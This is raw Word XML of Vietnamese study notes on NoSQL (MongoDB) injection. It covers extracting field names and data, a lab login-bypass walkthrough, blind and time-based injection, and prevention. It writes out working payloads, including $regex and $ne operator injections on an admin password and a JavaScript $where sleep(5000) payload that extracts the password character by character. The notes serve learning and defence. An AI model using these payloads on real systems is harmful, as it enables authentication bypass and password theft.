          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Trích</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00897E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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xuất</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00897E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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tên</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00897E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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>trường</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77939FB5" w14:textId="77777777" w:rsidR="00897E6F" w:rsidRPr="00897E6F" w:rsidRDefault="00897E6F" w:rsidP="00897E6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97E6F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chèn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JavaScript,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> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00897E6F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>keys(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00897E6F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7562D29E" w14:textId="77777777" w:rsidR="00897E6F" w:rsidRPr="00897E6F" w:rsidRDefault="00897E6F" w:rsidP="00897E6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00897E6F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"$where":"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Object.keys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>(this)[0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00897E6F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>].match</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00897E6F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>('^.{</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00897E6F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0}a.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00897E6F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>*')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B36FEF1" w14:textId="77777777" w:rsidR="00897E6F" w:rsidRPr="00897E6F" w:rsidRDefault="00897E6F" w:rsidP="00897E6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00897E6F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Thao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. Thao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89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E6F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tự</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7406DCC6" w14:textId="77777777" w:rsidR="00E92857" w:rsidRPr="00E92857" w:rsidRDefault="00E92857" w:rsidP="00E9285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92857">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Trích</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E928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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xuất</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E928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E928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E928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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bằng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E928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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cách</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E928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 w:rsidRPr="00E928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E928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E928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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tử</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46507E35" w14:textId="77777777" w:rsidR="00E92857" w:rsidRPr="00E92857" w:rsidRDefault="00E92857" w:rsidP="00E9285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92857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JavaScript.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> $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regextử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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19068ED9" w14:textId="77777777" w:rsidR="00E92857" w:rsidRPr="00E92857" w:rsidRDefault="00E92857" w:rsidP="00E9285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92857">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hãy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chấp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dung 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POSTyêu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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA2DB46" w14:textId="77777777" w:rsidR="00E92857" w:rsidRPr="00E92857" w:rsidRDefault="00E92857" w:rsidP="00E92857">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E92857">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{"username":"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myuser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>","password":"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mypass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>"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C2C800" w14:textId="77777777" w:rsidR="00E92857" w:rsidRPr="00E92857" w:rsidRDefault="00E92857" w:rsidP="00E9285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92857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> $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regextoán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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487F6AFC" w14:textId="77777777" w:rsidR="00E92857" w:rsidRPr="00E92857" w:rsidRDefault="00E92857" w:rsidP="00E92857">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E92857">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{"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username":"admin","password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E92857">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>":{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E92857">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"$regex":"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E92857">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>^.*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E92857">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B382E38" w14:textId="77777777" w:rsidR="00E92857" w:rsidRPr="00E92857" w:rsidRDefault="00E92857" w:rsidP="00E9285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9285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> $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regextử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85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92857">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> a:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237A8AF6" w14:textId="15521108" w:rsidR="00AA766C" w:rsidRPr="00BC7C15" w:rsidRDefault="00E92857" w:rsidP="00E92857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>{"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username":"admin","password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>":{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"$regex":"^a*"}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6178A9B4" w14:textId="2B818CCE" w:rsidR="00E92857" w:rsidRPr="00BC7C15" w:rsidRDefault="002976CE" w:rsidP="00E92857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>LAB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4847E105" w14:textId="77777777" w:rsidR="00165694" w:rsidRPr="00BC7C15" w:rsidRDefault="00165694" w:rsidP="00165694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password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server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passwd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r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{"$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ne":"invalid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"}</w:t>
      </w:r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user Carlos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password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"invalid".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08906472" w14:textId="77777777" w:rsidR="00165694" w:rsidRPr="00165694" w:rsidRDefault="00165694" w:rsidP="00165694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6569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(Carlos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password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"invalid"),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match.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266A24E9" w14:textId="77777777" w:rsidR="00165694" w:rsidRPr="00165694" w:rsidRDefault="00165694" w:rsidP="00165694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165694">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">→ MongoDB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document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carlos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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5116BAA9" w14:textId="77777777" w:rsidR="00165694" w:rsidRPr="00165694" w:rsidRDefault="00165694" w:rsidP="00165694">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165694">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Tuy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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7003D230" w14:textId="77777777" w:rsidR="00165694" w:rsidRPr="00165694" w:rsidRDefault="00165694" w:rsidP="00165694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6569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username,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password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hề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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA371BF" w14:textId="77777777" w:rsidR="00165694" w:rsidRPr="00165694" w:rsidRDefault="00165694" w:rsidP="00165694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6569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query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password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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624FA565" w14:textId="77777777" w:rsidR="00165694" w:rsidRPr="00165694" w:rsidRDefault="00165694" w:rsidP="00165694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6569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backend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/ brute-force / injection,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password,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account </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00165694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165694">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Account locked).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA055FB" w14:textId="2488FAF2" w:rsidR="002976CE" w:rsidRPr="00BC7C15" w:rsidRDefault="002976CE" w:rsidP="00E92857">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="386B8285" w14:textId="15B45F04" w:rsidR="002976CE" w:rsidRPr="00BC7C15" w:rsidRDefault="00165694" w:rsidP="00E92857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3ADEAFA" wp14:editId="07630DDE">
            <wp:extent cx="5943600" cy="3629660"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1419303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039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B08E" w14:textId="210F09DF" w:rsidR="0013306C" w:rsidRPr="00BC7C15" w:rsidRDefault="0013306C" w:rsidP="00E9285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: Invalid username or password</w:t>
      </w:r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r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"$where": "0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E9B633" w14:textId="5200DDF0" w:rsidR="0027591F" w:rsidRPr="00BC7C15" w:rsidRDefault="0013306C" w:rsidP="00E92857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4F195B" wp14:editId="37DDD77A">
            <wp:extent cx="5943600" cy="2814320"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="24908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829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3465" w14:textId="77777777" w:rsidR="002C4524" w:rsidRPr="00BC7C15" w:rsidRDefault="002C4524" w:rsidP="00E92857">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="395C57E1" w14:textId="77777777" w:rsidR="002C4524" w:rsidRPr="00BC7C15" w:rsidRDefault="002C4524" w:rsidP="00E92857">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60A4358B" w14:textId="77777777" w:rsidR="002C4524" w:rsidRPr="00BC7C15" w:rsidRDefault="002C4524" w:rsidP="00E92857">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21B9340E" w14:textId="11A946AB" w:rsidR="002C4524" w:rsidRPr="00BC7C15" w:rsidRDefault="002C4524" w:rsidP="00E92857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lastRenderedPageBreak/>
        <w:t xml:space="preserve">$where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JavaScript expressions →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Blind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NoSQLi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chèn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JS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194E9E02" w14:textId="27358D35" w:rsidR="0013306C" w:rsidRPr="00BC7C15" w:rsidRDefault="002C4524" w:rsidP="00E92857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76F5DB" wp14:editId="32FC76BE">
            <wp:extent cx="5943600" cy="3315335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="163119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907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ED5D" w14:textId="77777777" w:rsidR="00BC7C15" w:rsidRPr="00BC7C15" w:rsidRDefault="00BC7C15" w:rsidP="00BC7C1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Tiêm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dựa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trên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thời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gian</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12DCD870" w14:textId="77777777" w:rsidR="00BC7C15" w:rsidRPr="00BC7C15" w:rsidRDefault="00BC7C15" w:rsidP="00BC7C1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Đôi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. Trong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hổng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JavaScript injection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trễ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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D67F763" w14:textId="77777777" w:rsidR="00BC7C15" w:rsidRPr="00BC7C15" w:rsidRDefault="00BC7C15" w:rsidP="00BC7C1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tiêm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NoSQL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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588A5B5E" w14:textId="77777777" w:rsidR="00BC7C15" w:rsidRPr="00BC7C15" w:rsidRDefault="00BC7C15" w:rsidP="00BC7C15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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE00D26" w14:textId="77777777" w:rsidR="00BC7C15" w:rsidRPr="00BC7C15" w:rsidRDefault="00BC7C15" w:rsidP="00BC7C15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Chèn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trễ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: {"$where": "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sleep(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5000)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"}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gây</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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trễ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ý 5000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ms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tiêm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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04654925" w14:textId="77777777" w:rsidR="00BC7C15" w:rsidRPr="00BC7C15" w:rsidRDefault="00BC7C15" w:rsidP="00BC7C15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chậm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tiêm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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB3B7DB" w14:textId="77777777" w:rsidR="00BC7C15" w:rsidRPr="00BC7C15" w:rsidRDefault="00BC7C15" w:rsidP="00BC7C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7C15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trễ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 a:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E40699" w14:textId="55A114DD" w:rsidR="00BC7C15" w:rsidRPr="00BC7C15" w:rsidRDefault="00BC7C15" w:rsidP="00BC7C1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lastRenderedPageBreak/>
        <w:t>admin'+function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(x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){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 xml:space="preserve">var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waitTill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Date(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new Date(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getTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>() + 5000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);while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((</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>x.password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15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0]=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 xml:space="preserve">=="a") &amp;&amp;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waitTill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&gt; new Date(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)){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}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;}(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this)+'admin'+function(x){if(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x.password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0]=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=="a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"){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sleep(5000)}</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;}(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this)+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D849845" w14:textId="77777777" w:rsidR="00BC7C15" w:rsidRPr="00BC7C15" w:rsidRDefault="00BC7C15" w:rsidP="00BC7C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F8943AA" w14:textId="77777777" w:rsidR="00BC7C15" w:rsidRPr="00BC7C15" w:rsidRDefault="00BC7C15" w:rsidP="00BC7C1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Ngăn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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>chặn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> NoSQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF59C5D" w14:textId="77777777" w:rsidR="00BC7C15" w:rsidRPr="00BC7C15" w:rsidRDefault="00BC7C15" w:rsidP="00BC7C1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ngăn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chặn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NoSQL injection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NoSQL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khuyên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NoSQL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. Tuy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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7C59D4" w14:textId="77777777" w:rsidR="00BC7C15" w:rsidRPr="00BC7C15" w:rsidRDefault="00BC7C15" w:rsidP="00BC7C15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trùng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chấp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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398EDCC7" w14:textId="77777777" w:rsidR="00BC7C15" w:rsidRPr="00BC7C15" w:rsidRDefault="00BC7C15" w:rsidP="00BC7C15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Chèn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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B89210" w14:textId="77777777" w:rsidR="00BC7C15" w:rsidRPr="00BC7C15" w:rsidRDefault="00BC7C15" w:rsidP="00BC7C15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ngăn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chặn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chèn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chấp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15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BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC44A4B" w14:textId="77777777" w:rsidR="00BC7C15" w:rsidRPr="00BC7C15" w:rsidRDefault="00BC7C15" w:rsidP="00BC7C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39903566" w14:textId="77777777" w:rsidR="002C4524" w:rsidRPr="00BC7C15" w:rsidRDefault="002C4524" w:rsidP="00E92857">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22F53875" w14:textId="77777777" w:rsidR="0013306C" w:rsidRPr="00BC7C15" w:rsidRDefault="0013306C" w:rsidP="00E92857">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0013306C" w:rsidRPr="00BC7C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B3958"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4294A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394BE5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="91E0D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617785"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E4F64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E35FD8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D621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7E5E08"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5E844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B53E2F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8FE0E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2F78CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="90FA5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D87E16"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B9BCD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A64C09"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8EBEB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9E4E24"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26C6C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743153F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="67B04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9211738">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="197934374">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1081223483">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="495346415">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="711197539">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="2121298192">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="239369468">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1866475807">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1622495846">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1228224816">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1759597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BB6"/>
    <w:rsid w:val="00015A42"/>
    <w:rsid w:val="0005332F"/>
    <w:rsid w:val="000A3C01"/>
    <w:rsid w:val="000C4054"/>
    <w:rsid w:val="000D3435"/>
    <w:rsid w:val="0013306C"/>
    <w:rsid w:val="0013311C"/>
    <w:rsid w:val="00165694"/>
    <w:rsid w:val="00224BB6"/>
    <w:rsid w:val="00236F00"/>
    <w:rsid w:val="00263A10"/>
    <w:rsid w:val="0027591F"/>
    <w:rsid w:val="002976CE"/>
    <w:rsid w:val="002C4524"/>
    <w:rsid w:val="002E6E4D"/>
    <w:rsid w:val="00341EDB"/>
    <w:rsid w:val="00346567"/>
    <w:rsid w:val="004E14FB"/>
    <w:rsid w:val="004E43F3"/>
    <w:rsid w:val="00542E16"/>
    <w:rsid w:val="00564494"/>
    <w:rsid w:val="00656453"/>
    <w:rsid w:val="00722F64"/>
    <w:rsid w:val="0074599E"/>
    <w:rsid w:val="007A49CF"/>
    <w:rsid w:val="00852CA8"/>
    <w:rsid w:val="00897E6F"/>
    <w:rsid w:val="008D3B55"/>
    <w:rsid w:val="009841A1"/>
    <w:rsid w:val="00A65DEB"/>
    <w:rsid w:val="00AA766C"/>
    <w:rsid w:val="00AF259A"/>
    <w:rsid w:val="00B175DD"/>
    <w:rsid w:val="00B37013"/>
    <w:rsid w:val="00B8723C"/>
    <w:rsid w:val="00BC7C15"/>
    <w:rsid w:val="00C81736"/>
    <w:rsid w:val="00CF2A0A"/>
    <w:rsid w:val="00D2010E"/>
    <w:rsid w:val="00D26BA1"/>
    <w:rsid w:val="00D32B58"/>
    <w:rsid w:val="00D3394D"/>
    <w:rsid w:val="00DA0722"/>
    <w:rsid w:val="00E74791"/>
    <w:rsid w:val="00E92857"/>
    <w:rsid w:val="00EC6B30"/>
    <w:rsid w:val="00EE4EF0"/>
    <w:rsid w:val="00EF4CCD"/>
